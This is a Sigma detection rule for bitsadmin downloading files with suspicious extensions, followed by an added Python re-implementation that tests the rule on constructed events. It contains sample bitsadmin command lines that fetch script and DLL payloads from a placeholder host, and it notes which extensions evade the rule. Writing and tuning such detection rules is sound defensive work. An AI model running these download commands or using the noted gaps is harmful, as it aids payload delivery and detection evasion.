File With Suspicious Extension Downloaded Via Bitsadmin

Detects usage of bitsadmin downloading a file with a suspicious extension

Sigma rule

title: File With Suspicious Extension Downloaded Via Bitsadmin
id: 5b80a791-ad9b-4b75-bcc1-ad4e1e89c200
status: test
description: Detects usage of bitsadmin downloading a file with a suspicious extension
references:
    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin
    - https://isc.sans.edu/diary/22264
    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2022/06/28
modified: 2023/05/30
tags:
    - attack.defense_evasion
    - attack.persistence
    - attack.t1197
    - attack.s0190
    - attack.t1036.003
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\bitsadmin.exe'
        - OriginalFileName: 'bitsadmin.exe'
    selection_flags:
        CommandLine|contains:
            - ' /transfer '
            - ' /create '
            - ' /addfile '
    selection_extension:
        CommandLine|contains:
            - '.7z'
            - '.asax'
            - '.ashx'
            - '.asmx'
            - '.asp'
            - '.aspx'
            - '.bat'
            - '.cfm'
            - '.cgi'
            - '.chm'
            - '.cmd'
            - '.dll'
            - '.gif'
            - '.jpeg'
            - '.jpg'
            - '.jsp'
            - '.jspx'
            - '.log'
            - '.png'
            - '.ps1'
            - '.psm1'
            - '.rar'
            - '.scf'
            - '.sct'
            - '.txt'
            - '.vbe'
            - '.vbs'
            - '.war'
            - '.wsf'
            - '.wsh'
            - '.xll'
            - '.zip'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
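The following is an added example, not part of the SigmaHQ rule or of any Sigma backend: it re-implements the rule's three selections in plain Python and runs them over a handful of constructed process_creation events. It follows the default Sigma semantics (field modifiers are case-insensitive, a list under a single field is OR, the list of maps under selection_img is OR, and `all of selection_*` is AND). The events, the `example.invalid` host and the paths are made up for the demonstration; the field names (Image, OriginalFileName, CommandLine) are the ones the rule itself uses.

```python
"""Evaluate the 'File With Suspicious Extension Downloaded Via Bitsadmin'
Sigma rule against constructed Windows process_creation events.

Added example: not SigmaHQ code and not a real Sigma backend. It models the
default Sigma string semantics (case-insensitive endswith/contains/equals)
for the three selections and the 'all of selection_*' condition.
"""

# Values copied verbatim from the rule above.
IMAGE_SUFFIX = "\\bitsadmin.exe"
ORIGINAL_FILE_NAME = "bitsadmin.exe"
FLAGS = (" /transfer ", " /create ", " /addfile ")
EXTENSIONS = (
    ".7z", ".asax", ".ashx", ".asmx", ".asp", ".aspx", ".bat", ".cfm", ".cgi",
    ".chm", ".cmd", ".dll", ".gif", ".jpeg", ".jpg", ".jsp", ".jspx", ".log",
    ".png", ".ps1", ".psm1", ".rar", ".scf", ".sct", ".txt", ".vbe", ".vbs",
    ".war", ".wsf", ".wsh", ".xll", ".zip",
)


def _field(event, name):
    # Sigma string matching is case-insensitive by default; an absent field
    # never matches, so treat it as an empty string.
    return (event.get(name) or "").lower()


def selection_img(event):
    # Two maps in a list: the binary path OR the PE's original file name.
    # The second branch is what catches a renamed copy of bitsadmin.exe.
    return (_field(event, "Image").endswith(IMAGE_SUFFIX.lower())
            or _field(event, "OriginalFileName") == ORIGINAL_FILE_NAME.lower())


def selection_flags(event):
    # Note the surrounding spaces: the rule needs ' /transfer ' as a token.
    cmd = _field(event, "CommandLine")
    return any(flag in cmd for flag in FLAGS)


def matched_extensions(event):
    # Plain substring matching anywhere in the command line, not only on the
    # destination path, so a job name or URL can satisfy this selection too.
    cmd = _field(event, "CommandLine")
    return [ext for ext in EXTENSIONS if ext in cmd]


def rule_matches(event):
    # condition: all of selection_*
    return (selection_img(event)
            and selection_flags(event)
            and bool(matched_extensions(event)))


# Constructed sample events (hypothetical hosts, users and paths).
SAMPLE_EVENTS = [
    {"id": "direct", "Image": r"C:\Windows\System32\bitsadmin.exe",
     "OriginalFileName": "bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /transfer job /download /priority high "
                    r"http://example.invalid/a.ps1 C:\Users\Public\a.ps1"},
    {"id": "renamed", "Image": r"C:\Users\Public\bits.exe",
     "OriginalFileName": "bitsadmin.exe",
     "CommandLine": r"bits.exe /addfile myjob http://example.invalid/x.dll "
                    r"C:\Users\Public\x.dll"},
    {"id": "mixedcase", "Image": r"C:\WINDOWS\SYSTEM32\BITSADMIN.EXE",
     "OriginalFileName": "bitsadmin.exe",
     "CommandLine": r"BITSADMIN.EXE /Transfer dl http://example.invalid/Payload.VBS "
                    r"C:\Users\Public\Payload.VBS"},
    {"id": "jobname", "Image": r"C:\Windows\System32\bitsadmin.exe",
     "OriginalFileName": "bitsadmin.exe",
     "CommandLine": "bitsadmin.exe /create backup.zip"},
    {"id": "msi", "Image": r"C:\Windows\System32\bitsadmin.exe",
     "OriginalFileName": "bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /transfer j http://example.invalid/update.msi "
                    r"C:\Users\Public\update.msi"},
    {"id": "exe", "Image": r"C:\Windows\System32\bitsadmin.exe",
     "OriginalFileName": "bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /transfer j http://example.invalid/bin "
                    r"C:\Users\Public\out.exe"},
    {"id": "list", "Image": r"C:\Windows\System32\bitsadmin.exe",
     "OriginalFileName": "bitsadmin.exe",
     "CommandLine": "bitsadmin.exe /list /allusers"},
    {"id": "notepad", "Image": r"C:\Windows\System32\notepad.exe",
     "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": r"notepad.exe C:\Users\Public\notes.txt"},
]


def evaluate(events=SAMPLE_EVENTS):
    """Return {event id: True if the rule fires}."""
    return {e["id"]: rule_matches(e) for e in events}


if __name__ == "__main__":
    for event_id, hit in evaluate().items():
        print(f"{event_id:10s} {'ALERT' if hit else 'no match'}")
```

Two of the constructed events are worth a second look when tuning. The `jobname` event fires although nothing is downloaded yet, because `.zip` appears in the job name and the rule matches substrings anywhere in the command line. The `msi` and `exe` events do not fire at all, since neither extension is in the list; a transfer of an executable or installer via bitsadmin is only covered by other rules, and an environment that cares about it should pair this rule with one that keys on `/transfer` alone or on the destination directory.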
